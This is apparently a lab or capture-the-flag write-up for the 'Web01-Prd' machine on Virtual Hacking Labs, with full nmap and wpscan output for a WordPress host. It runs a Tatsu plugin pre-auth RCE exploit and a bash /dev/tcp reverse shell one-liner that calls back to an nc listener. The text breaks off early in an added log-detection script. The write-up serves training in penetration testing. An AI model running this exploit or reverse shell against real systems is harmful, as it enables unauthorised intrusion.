VHL — Web01-Prd
Web · Easy · Linux
Production web server with anonymous FTP access. Weak credentials and misconfigured permissions lead to full compromise.
February 9, 2025 · Virtual Hacking Labs
#FTP #Anonymous Login #Misconfiguration #Apache

nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 02:28 EST
Nmap scan report for 10.11.1.7
Host is up (0.019s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:9f:8f:4a:9c:33:41:3c:aa:be:19:be:fb:fd:52:a7 (RSA)
| 256 4f:09:f4:c7:95:ae:3d:d3:3b:6d:82:fa:36:bb:d8:d0 (ECDSA)
|_ 256 92:34:16:5a:0e:67:fe:a4:2c:de:5d:76:bf:59:94:fe (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Lab Web Development – A strategic approach to website de...
|_http-generator: WordPress 6.0
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
631/tcp open ipp CUPS 1.6
|_http-title: Forbidden - CUPS v1.6.3
|_http-server-header: CUPS/1.6 IPP/2.1
3306/tcp open mysql MariaDB (unauthorized)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 19.17 ms 10.11.1.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds

21
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status

80
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Lab Web Development – A strategic approach to website de...
|_http-generator: WordPress 6.0

wpscan
sudo wpscan -e ap,u --plugins-detection aggressive -t 500 --url http://10.11.1.7/ --api-token ZHnKbWjJuwEa5eShsBKgO7DzUr6lm2vehjiBnrspAQo
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[+] URL: http://10.11.1.7/ [10.11.1.7]
[+] Started: Sun Feb 9 02:32:43 2025
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.6 (CentOS) PHP/7.4.29
| - X-Powered-By: PHP/7.4.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.11.1.7/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.11.1.7/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.11.1.7/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.11.1.7/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://10.11.1.7/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://10.11.1.7/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>
|
| [!] 33 vulnerabilities identified:
|
| [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - SQLi via Link API
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
|
| [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
|
| [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
|
| [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
|
| [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
|
| [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
|
| [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
|
| [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
|
| [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
|
| [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
|
| [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
|
| [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/gutenberg/pull/45045/files
|
| [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
| References:
| - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
| - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
|
| [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
| Fixed in: 6.0.5
| References:
| - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
| - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
|
| [!] Title: WP < 6.2.1 - Contributor+ Content Injection
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
| - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
| Fixed in: 6.0.7
| References:
| - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
| Fixed in: 6.0.7
| References:
| - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
|
| [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
| Fixed in: 6.0.8
| References:
| - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
| - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.0.9
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.0.9
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.0.9
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[+] WordPress theme in use: thbusiness
| Location: http://10.11.1.7/wp-content/themes/thbusiness/
| Latest Version: 2.0.7 (up to date)
| Last Updated: 2019-01-21T00:00:00.000Z
| Readme: http://10.11.1.7/wp-content/themes/thbusiness/readme.txt
| Style URL: http://10.11.1.7/wp-content/themes/thbusiness/style.css?ver=6.0
| Style Name: THBusiness
| Style URI: http://www.themezhut.com/themes/thbusiness
| Description: THBusiness WordPress Theme is mainly focused for business websites while it consists with a simple e...
| Author: ThemezHut
| Author URI: http://www.themezhut.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.0.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.11.1.7/wp-content/themes/thbusiness/style.css?ver=6.0, Match: 'Version: 2.0.7'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:01:43 <=========================================================> (108967 / 108967) 100.00% Time: 00:01:43
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] advanced-uploader
| Location: http://10.11.1.7/wp-content/plugins/advanced-uploader/
| Latest Version: 4.2 (up to date)
| Last Updated: 2021-03-01T11:13:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/advanced-uploader/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/advanced-uploader/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Advanced Uploader <= 4.2 - Subscriber+ Arbitrary File Upload
| References:
| - https://wpscan.com/vulnerability/9ddeef95-7c7f-4296-a55b-fd3304c91c18
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1103
|
| Version: 4.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/advanced-uploader/readme.txt
[+] akismet
| Location: http://10.11.1.7/wp-content/plugins/akismet/
| Last Updated: 2025-02-04T21:01:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/akismet/, status: 200
|
| Version: 4.2.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/akismet/readme.txt
[+] perfect-survey
| Location: http://10.11.1.7/wp-content/plugins/perfect-survey/
| Latest Version: 1.5.1 (up to date)
| Last Updated: 2021-06-11T12:09:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/perfect-survey/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/perfect-survey/, status: 200
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update
| Fixed in: 1.5.2
| References:
| - https://wpscan.com/vulnerability/c73c7694-1cee-4f26-a425-9c336adce52b
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24763
|
| [!] Title: Perfect Survey < 1.5.2 - Unauthenticated SQL Injection
| Fixed in: 1.5.2
| References:
| - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24762
|
| [!] Title: Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting
| Fixed in: 1.5.2
| References:
| - https://wpscan.com/vulnerability/c2f8e9b9-c044-4c45-8d17-e628e9cb5d59
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24764
|
| [!] Title: Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting
| References:
| - https://wpscan.com/vulnerability/4440e7ca-1a55-444d-8f6c-04153302d750
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24765
|
| Version: 1.5.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/perfect-survey/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/perfect-survey/readme.txt
[+] tatsu
| Location: http://10.11.1.7/wp-content/plugins/tatsu/
| Readme: http://10.11.1.7/wp-content/plugins/tatsu/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/tatsu/, status: 200
|
| Version: 4.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/tatsu/README.txt
[+] wpdiscuz
| Location: http://10.11.1.7/wp-content/plugins/wpdiscuz/
| Last Updated: 2024-10-14T17:02:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/wpdiscuz/readme.txt
| [!] The version is out of date, the latest version is 7.6.27
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/wpdiscuz/, status: 200
|
| [!] 19 vulnerabilities identified:
|
| [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
| Fixed in: 7.0.5
| References:
| - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
| - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
| - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
|
| [!] Title: Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting
| Fixed in: 7.3.2
| References:
| - https://wpscan.com/vulnerability/f51a350c-c46d-4d52-b787-762283625d0b
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24737
|
| [!] Title: wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF
| Fixed in: 7.3.4
| References:
| - https://wpscan.com/vulnerability/2746101e-e993-42b9-bd6f-dfd5544fa3fe
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24806
| - https://www.youtube.com/watch?v=CL7Bttu2W-o
|
| [!] Title: wpDiscuz < 7.3.12 - Sensitive Information Disclosure
| Fixed in: 7.3.12
| References:
| - https://wpscan.com/vulnerability/027e6ef8-39d8-4fa9-957f-f53ee7175c0a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23984
|
| [!] Title: wpDiscuz < 7.6.4 - Unauthenticated Data Modification via IDOR
| Fixed in: 7.6.4
| References:
| - https://wpscan.com/vulnerability/d7de195a-a932-43dd-bbb4-784a19324b04
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3869
|
| [!] Title: wpDiscuz < 7.6.4 - Post Rating Increase/Decrease iva IDOR
| Fixed in: 7.6.4
| References:
| - https://wpscan.com/vulnerability/051ab8b8-210e-48ac-82e7-7c4a0aa2ecd5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3998
|
| [!] Title: wpDiscuz < 7.6.12 - Unauthenticated Stored XSS
| Fixed in: 7.6.12
| References:
| - https://wpscan.com/vulnerability/f061ffa4-25f2-4ad5-9edb-6cb2c7b678d1
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47185
|
| [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
| Fixed in: 7.6.6
| Reference: https://wpscan.com/vulnerability/ebb5ed9a-4fb2-4d64-a8f2-6957878a4599
|
| [!] Title: wpDiscuz < 7.6.4 - Author+ IDOR
| Fixed in: 7.6.4
| References:
| - https://wpscan.com/vulnerability/d5e677ef-786f-4921-97d9-cbf0c2e21df9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46311
|
| [!] Title: wpDiscuz < 7.6.11 - Unauthenticated Content Injection
| Fixed in: 7.6.11
| References:
| - https://wpscan.com/vulnerability/8c8cabee-285a-408f-9449-7bb545c07cdc
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46310
|
| [!] Title: wpDiscuz < 7.6.11 - Insufficient Authorization to Comment Submission on Deleted Posts
| Fixed in: 7.6.11
| References:
| - https://wpscan.com/vulnerability/874679f2-bf44-4c11-bc3b-69ae5ac59ced
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46309
|
| [!] Title: wpDiscuz < 7.6.12 - Missing Authorization in AJAX Actions
| Fixed in: 7.6.12
| References:
| - https://wpscan.com/vulnerability/2e121d4f-7fdf-428c-8251-a586cbd31a96
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45760
|
| [!] Title: wpDiscuz < 7.6.12 - Cross-Site Request Forgery
| Fixed in: 7.6.12
| References:
| - https://wpscan.com/vulnerability/f8dfcc13-187c-4a83-a87e-761c0db4b6d9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47775
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/53af9dfd-eb2d-4f6f-b02f-daf790b95f1f
|
| [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
| Fixed in: 7.6.6
| References:
| - https://wpscan.com/vulnerability/a2fec175-40f6-4a80-84ed-5b88251584de
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd1e52c-83b7-4b3e-a791-a2c0ccd856bc
|
| [!] Title: wpDiscuz < 7.6.13 - Admin+ Stored XSS
| Fixed in: 7.6.13
| References:
| - https://wpscan.com/vulnerability/79aed6a7-a6e2-4429-8f98-ccac6b59fb4d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51691
| - https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability
|
| [!] Title: wpDiscuz < 7.6.16 - Authenticated (Author+) Stored Cross-Site Scripting via Uploaded Image Alternative Text
| Fixed in: 7.6.16
| References:
| - https://wpscan.com/vulnerability/f3a337ae-54e5-41ca-a0d9-60745b568469
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2477
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eddc03d-ecff-4b50-a574-7b6b62e53af0
|
| [!] Title: Comments – wpDiscuz < 7.6.19 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 7.6.19
| References:
| - https://wpscan.com/vulnerability/607da7a6-c2f2-4a9e-9471-8e0d29f355d9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35681
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/005bf2f0-892f-4248-afe3-263ae3d2ac54
|
| [!] Title: Comments – wpDiscuz < 7.6.22 - Unauthenticated HTML Injection
| Fixed in: 7.6.22
| References:
| - https://wpscan.com/vulnerability/66542876-77ae-442d-acde-2aac642f1d36
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6704
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa3501a4-7975-4f90-8037-f8a06c293c07
|
| [!] Title: Comments – wpDiscuz < 7.6.25 - Authentication Bypass
| Fixed in: 7.6.25
| References:
| - https://wpscan.com/vulnerability/b95d9907-2c2d-4187-b902-d67262ea6b6d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9488
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/b71706a7-e101-4d50-a2da-1aeeaf07cf4b
|
| Version: 7.0.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/wpdiscuz/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:05 <=================================================================> (10 / 10) 100.00% Time: 00:00:05
[i] User(s) Identified:
[+] web01
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.11.1.7/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 7
| Requests Remaining: 18
[+] Finished: Sun Feb 9 02:34:44 2025
[+] Requests Done: 109050
[+] Cached Requests: 18
[+] Data Sent: 33.03 MB
[+] Data Received: 15.941 MB
[+] Memory used: 471.207 MB
[+] Elapsed time: 00:02:01

tatsu plugin
- https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd/
python3 tatsu_exploit.py http://10.11.1.7 whoami
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.8
|=== CVE-2021-XXX / Vincent MICHEL (@darkpills)
[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://10.11.1.7/wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://10.11.1.7/wp-content/uploads/typehub/custom/whp/.rnsti.php
[+] Exploit success!
apache
[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done

reverse shell
python3 tatsu_exploit.py http://10.11.1.7 'bash -i >& /dev/tcp/172.16.1.1/1234 0>&1'
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.7] 56348
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
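Both requests the Tatsu exploit run above makes (the POST to admin-ajax.php?action=add_custom_font and the GET for the dropped .php file under wp-content/uploads/typehub/custom/) land in the Apache access log, so the pattern is visible after the fact. The block below is an added example, not code from the original writeup or the Tatsu project: it flags that two-step sequence over constructed combined-format log lines, and it assumes the server logs in that format.

```python
"""Flag the Tatsu custom-font upload pattern in Apache access logs.

Added example for this writeup, not code from the original page or from the
Tatsu project. The sample log lines are constructed to mirror the two
requests shown in the exploit output; the combined log format is assumed.
"""
import re

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
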